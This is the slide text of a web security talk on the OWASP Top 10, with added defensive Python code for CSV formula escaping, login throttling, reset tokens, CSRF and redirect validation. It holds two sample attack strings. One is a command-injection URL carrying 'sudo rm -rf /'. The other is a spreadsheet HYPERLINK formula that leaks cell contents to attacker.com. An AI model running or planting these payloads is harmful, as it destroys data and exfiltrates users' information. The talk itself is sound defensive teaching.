Slide 1

Let’s talk Security
Understanding, Exploiting and Defending against Top Web Vulnerabilities
Dheeraj Joshi, djadmin.in

Slide 2

About Me
I find security vulnerabilities for fun & swag, and I wear a White Hat.
Uber, CKEditor, Dropbox, MailChimp, InVision, DigitalOcean, Cloudflare, Intuit, Groupon, etc.
What makes me happy?

Slide 3

Security - Into The Details
● OWASP’s Top 10 Vulnerabilities
  ○ Explain
  ○ Impact
  ○ Defense
  ○ Real examples (External + Internal)
● Demo - RCE
● Q & A

Slide 4

Why should Startups Care about Security?
Startups & SMEs are prone to cutting corners. One of the first things they cut is ‘Security’.

Slide 5

(no text on this slide)

Slide 6

HACKER PUTS HOSTING SERVICE CODE SPACES OUT OF BUSINESS
The Shutdown

Slide 7

OWASP Top 10 And Beyond

Slide 8

INJECTION

Slide 9

PREVENT INJECTION
● For databases use prepared statements
● Whitelist inputs wherever possible
● Sanitize inputs (use filter extension)
● Don’t trust user input and always verify!

Slide 10

Example: Google Command Injection
We can include any command in the URL below:
https://console.cloud.google.com/home/dashboard?project=;sudo rm -rf /
Found by an Indian Security Researcher (S. Venkatesh)

Slide 11

Exploiting ‘Export as CSV’ functionality: Formula Injection
=HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click for further information")
If the victim clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to the attacker’s website, which may include other users’ sensitive information.
Fix: prefix any cell that begins with a formula trigger (=, +, -) with a single quote (').
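The fix from the slide applied in an export routine. This is an added example, not code from the talk. It goes slightly beyond the slide: besides =, + and - it also treats @ and a leading whitespace run before a trigger as formula starts, since spreadsheets evaluate those too. The sample rows are constructed; the HYPERLINK payload in them is the one shown on the slide.

```python
import csv
import io

# Characters that make a spreadsheet evaluate the cell as a formula.
# The slide names "=", "+" and "-"; "@" is added here.
FORMULA_TRIGGERS = ("=", "+", "-", "@")


def escape_csv_cell(value) -> str:
    """Neutralise a cell by prefixing a single quote when it would start a
    formula. The quote makes the spreadsheet treat the content as text."""
    text = str(value)
    # Leading whitespace does not stop evaluation, so look past it.
    if text.lstrip(" \t\r\n").startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows) -> str:
    """Write rows to CSV with every cell escaped; csv.writer handles quoting
    of commas and double quotes so the file stays well formed."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        writer.writerow([escape_csv_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed export: a user-supplied display name carries the slide's payload.
SAMPLE_ROWS = [
    ["user_id", "display_name", "email"],
    [1, "Alice", "alice@example.com"],
    [2, '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click for further information")', "mallory@example.com"],
    [3, "-Bob", "bob@example.com"],
]


if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS))
```

Escaping on export is the right layer: the same name may be rendered harmlessly in HTML, so rejecting it at input time would break legitimate values such as "-Bob" or a phone number written as +44.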

Slide 12

BROKEN AUTHENTICATION AND SESSION MANAGEMENT

Slide 13

MITIGATION
● Enforce strong password policy
● Require periodic reset of password
● Use 2 factor authentication
● Use SSL and secure flag on cookies
● Don’t neglect failed-login detection & tracking
● Only use httpOnly cookies
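Two of the bullets above as working code, added here as an example rather than taken from the talk: a sliding-window failed-login tracker (the detection & tracking item) and a session cookie issued with the Secure and HttpOnly flags. SameSite=Strict is an addition beyond the slide's list. The threshold, window, account names and session id are constructed values.

```python
import time
from collections import defaultdict, deque
from http.cookies import SimpleCookie


class FailedLoginTracker:
    """Counts failed logins per account within a sliding time window and
    reports when an account has crossed the threshold (lockout or alert)."""

    def __init__(self, threshold: int = 5, window_seconds: int = 300):
        self.threshold = threshold
        self.window = window_seconds
        self._events = defaultdict(deque)  # account -> timestamps of failures

    def _prune(self, account: str, now: float) -> deque:
        q = self._events[account]
        while q and now - q[0] > self.window:
            q.popleft()  # drop failures older than the window
        return q

    def record_failure(self, account: str, now: float = None) -> int:
        """Record one failed attempt; returns the count inside the window."""
        now = time.time() if now is None else now
        q = self._prune(account, now)
        q.append(now)
        return len(q)

    def is_locked(self, account: str, now: float = None) -> bool:
        now = time.time() if now is None else now
        return len(self._prune(account, now)) >= self.threshold

    def record_success(self, account: str) -> None:
        """A successful login clears the counter."""
        self._events.pop(account, None)


def session_cookie_header(session_id: str, max_age: int = 3600) -> str:
    """Build the value of a Set-Cookie header for the session cookie with the
    flags the slide asks for: Secure (HTTPS only) and HttpOnly (no script
    access). SameSite=Strict additionally blocks cross-site sends."""
    jar = SimpleCookie()
    jar["session"] = session_id
    morsel = jar["session"]
    morsel["secure"] = True
    morsel["httponly"] = True
    morsel["samesite"] = "Strict"
    morsel["path"] = "/"
    morsel["max-age"] = max_age
    return morsel.OutputString()


if __name__ == "__main__":
    tracker = FailedLoginTracker(threshold=3, window_seconds=60)
    for _ in range(3):
        tracker.record_failure("alice")
    print("alice locked:", tracker.is_locked("alice"))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```

The tracker is keyed by account; keying a second instance by source IP catches password spraying across many accounts, which a per-account counter alone misses.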

Slide 14

CROSS SITE SCRIPTING - XSS
● XSS attacks users
● “JavaScript Injection”
● Exploits can be bad, really bad...

Slide 15

What is XSS? Typical Reflected XSS

Slide 16

Stored XSS

Slide 17

DOM XSS

Slide 18

Protect Yourself
● Use filter extension to filter inputs
● Ensure that outputs are HTML encoded
● Don’t reinvent the wheel
● Don’t consider any part of the request as being “safe”

Slide 19

ngBind attribute
$sanitize - service in module ngSanitize
Sanitizes an HTML string by stripping all potentially dangerous tokens.

Slide 20

INSECURE DIRECT OBJECT REFERENCES

Slide 21

Scenario / Exploit
1) First, an attacker signs up for an account and requests “forgot password”.
2) They receive a link: https://vimeo.com/forgot_password/[user id]/[token]

Slide 22

Prevention
● Low level access controls
● Prevent user input in file/URL access commands
● No unsanitized input to execution commands
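How the reset link from the scenario on the previous slide can be made safe against swapping the user id, plus the generic ownership check the "low level access controls" bullet calls for. This is an added example written for this page; it is not Vimeo's implementation and not code from the talk. The token format (expiry plus HMAC over user id and expiry), the server secret, the in-memory used-token set and the document records are all constructed for the demo.

```python
import hashlib
import hmac
import secrets
import time

# Constructed server-side secret for this demo; a deployment loads it from config.
SERVER_SECRET = secrets.token_bytes(32)

# Constructed in-memory record of consumed tokens, so each link works once.
USED_TOKENS: set = set()


def make_reset_token(user_id: int, expires_in: int = 900, now: float = None) -> str:
    """Issue a reset token cryptographically bound to one user id and an expiry."""
    expiry = int((time.time() if now is None else now) + expires_in)
    msg = f"{user_id}:{expiry}".encode()
    sig = hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()
    return f"{expiry}.{sig}"


def verify_reset_token(user_id: int, token: str, now: float = None) -> bool:
    """True only if the token was minted for exactly this user id and is unexpired."""
    try:
        expiry_str, sig = token.split(".", 1)
        expiry = int(expiry_str)
    except ValueError:
        return False
    if (time.time() if now is None else now) > expiry:
        return False
    expected = hmac.new(SERVER_SECRET, f"{user_id}:{expiry}".encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison: a wrong signature leaks nothing through timing.
    return hmac.compare_digest(expected, sig)


def handle_reset_request(user_id: int, token: str, now: float = None) -> bool:
    """Server side of /forgot_password/[user id]/[token]. The id in the URL is
    never trusted by itself: only a valid, unused token for that id unlocks
    the password change. Returns True when the caller may proceed."""
    if token in USED_TOKENS:
        return False
    if not verify_reset_token(user_id, token, now=now):
        return False
    USED_TOKENS.add(token)
    return True


def can_access_document(current_user_id: int, doc: dict) -> bool:
    """Direct-object-reference check: an id taken from the request grants
    nothing unless the object's owner is the authenticated user."""
    return doc.get("owner_id") == current_user_id


if __name__ == "__main__":
    link_token = make_reset_token(7)
    print("own account:", handle_reset_request(7, link_token))      # True
    print("other account:", handle_reset_request(8, link_token))    # False
```

Because the user id is covered by the HMAC, editing it in the URL invalidates the signature; the used-token set closes the replay window that a purely stateless token would leave open.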

Slide 23

SECURITY MISCONFIGURATION

Slide 24

PREVENTION > CURE
● Perform periodic security checks using automated tools
● Static Code Analysis
● Example: Hardening MySQL, Directory Listing, Auth Tokens

Slide 25

SENSITIVE DATA EXPOSURE
● Exposed PHP error messages
● Unencrypted sensitive data storage
● Not using SSL
● Example: a sensitive token should not be sent to external websites (Fitbit)

Slide 26

MISSING FUNCTION LEVEL ACCESS CONTROL
● Valid input processing without access controls
● Decentralized access control layer
● Example: Profile email address not validated (GitHub), S3 configuration

Slide 27

CROSS-SITE REQUEST FORGERY (CSRF)
● Don’t perform data changes on GET
● Use secure (csrf) tokens for POST
● Impact: Real bad, attack users
● Example: Dropbox, CodeSchool
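The first two bullets together: a state-changing endpoint that refuses GET and checks a per-session CSRF token on POST. Added example for this page, not code from the talk. The request is modelled as a plain dict, the token store is an in-memory dict, and the "change email" handler is a constructed stand-in for whatever state change a real app performs.

```python
import hmac
import secrets


class CsrfProtection:
    """Issues one unguessable token per session and verifies submissions."""

    def __init__(self):
        self._tokens = {}  # constructed in-memory store: session_id -> token

    def token_for(self, session_id: str) -> str:
        """Token to embed in the form; created on first use for the session."""
        tok = self._tokens.get(session_id)
        if tok is None:
            tok = secrets.token_urlsafe(32)
            self._tokens[session_id] = tok
        return tok

    def is_valid(self, session_id: str, submitted) -> bool:
        expected = self._tokens.get(session_id)
        if expected is None or not isinstance(submitted, str):
            return False
        return hmac.compare_digest(expected, submitted)


# Methods that must never change state; a forged <img src=...> can only send these.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def handle_change_email(request: dict, csrf: CsrfProtection, store: dict):
    """Endpoint that changes the account email. request has keys
    'method', 'session_id' and 'form'. Returns (status, message)."""
    if request["method"] in SAFE_METHODS:
        return 405, "state changes are not accepted on GET"
    if not csrf.is_valid(request["session_id"], request["form"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    store[request["session_id"]] = request["form"]["email"]
    return 200, "email updated"


if __name__ == "__main__":
    csrf = CsrfProtection()
    emails = {}
    tok = csrf.token_for("sess-1")
    forged = {"method": "POST", "session_id": "sess-1", "form": {"email": "evil@example.com"}}
    legit = {"method": "POST", "session_id": "sess-1",
             "form": {"email": "me@example.com", "csrf_token": tok}}
    print(handle_change_email(forged, csrf, emails))   # (403, ...)
    print(handle_change_email(legit, csrf, emails))    # (200, ...)
```

The browser attaches the session cookie to a forged request automatically, which is why the cookie alone proves nothing; the token in the form body is what the attacking site cannot read.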

Slide 28

USING COMPONENTS WITH KNOWN VULNERABILITIES
● Not keeping libraries up-to-date
● *cough*WordPress*cough*
● Example: Third-Party Libraries (Apache CXF Authentication Bypass, Spring RCE)

Slide 29

UNVALIDATED REDIRECTS AND FORWARDS
● Header Injection
● JavaScript Parameter Injection
● Reliance on HTTP_REFERER
● Abuse window opener (Facebook)

Slide 30

Example : Dropbox Open Redirect in v1 API
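A redirect-target validator for the class of bug the two slides above describe (the Dropbox case is only named, so this is not its fix). Added example, not code from the talk: it uses Python's urllib.parse, the allowed host list is a constructed value, and the policy (same-site relative paths or HTTPS URLs on an allowed host, everything else falls back to a default) is an assumption that a real app would tune.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed: hosts this application is willing to send users to.
ALLOWED_HOSTS = {"app.example.com"}


def safe_redirect_target(next_url, default: str = "/") -> str:
    """Return next_url if it is safe to use in a Location header, else default."""
    if not next_url:
        return default
    # Header injection: CR/LF inside the value would let the parameter add
    # or replace response headers.
    if "\r" in next_url or "\n" in next_url:
        return default
    parts = urlsplit(next_url.strip())
    # Non-HTTP schemes such as javascript: or data: are never redirect targets.
    if parts.scheme and parts.scheme not in ("http", "https"):
        return default
    if parts.netloc:
        # Absolute or scheme-relative (//evil.example) URL: only our own hosts,
        # and only over HTTPS. hostname strips any user@ prefix, so
        # https://app.example.com@evil.example resolves to evil.example here.
        if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
            return default
        return urlunsplit(parts)
    path = parts.path
    # Relative target: a single leading slash only. "//" and "/\" are treated
    # as scheme-relative by browsers, so they would leave the site.
    if not path.startswith("/") or path.startswith("//") or path.startswith("/\\"):
        return default
    return urlunsplit(("", "", path, parts.query, ""))


if __name__ == "__main__":
    for candidate in ["/dashboard?tab=1", "//evil.example/", "javascript:alert(1)",
                      "https://app.example.com/files", "https://evil.example/"]:
        print(repr(candidate), "->", safe_redirect_target(candidate))
```

The same check serves a JavaScript-side redirect (window.location = next) and a server Location header; what differs is only where the validated value is written.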

Slide 31

Remote Code Execution

Slide 32

The solution
● Reset all passwords and keys
● Remove backdoors (not easy)
OR
Destroy everything??

Slide 33

Thank you
References:
● https://www.owasp.org
● https://djadmin.in/pwn/ (tools)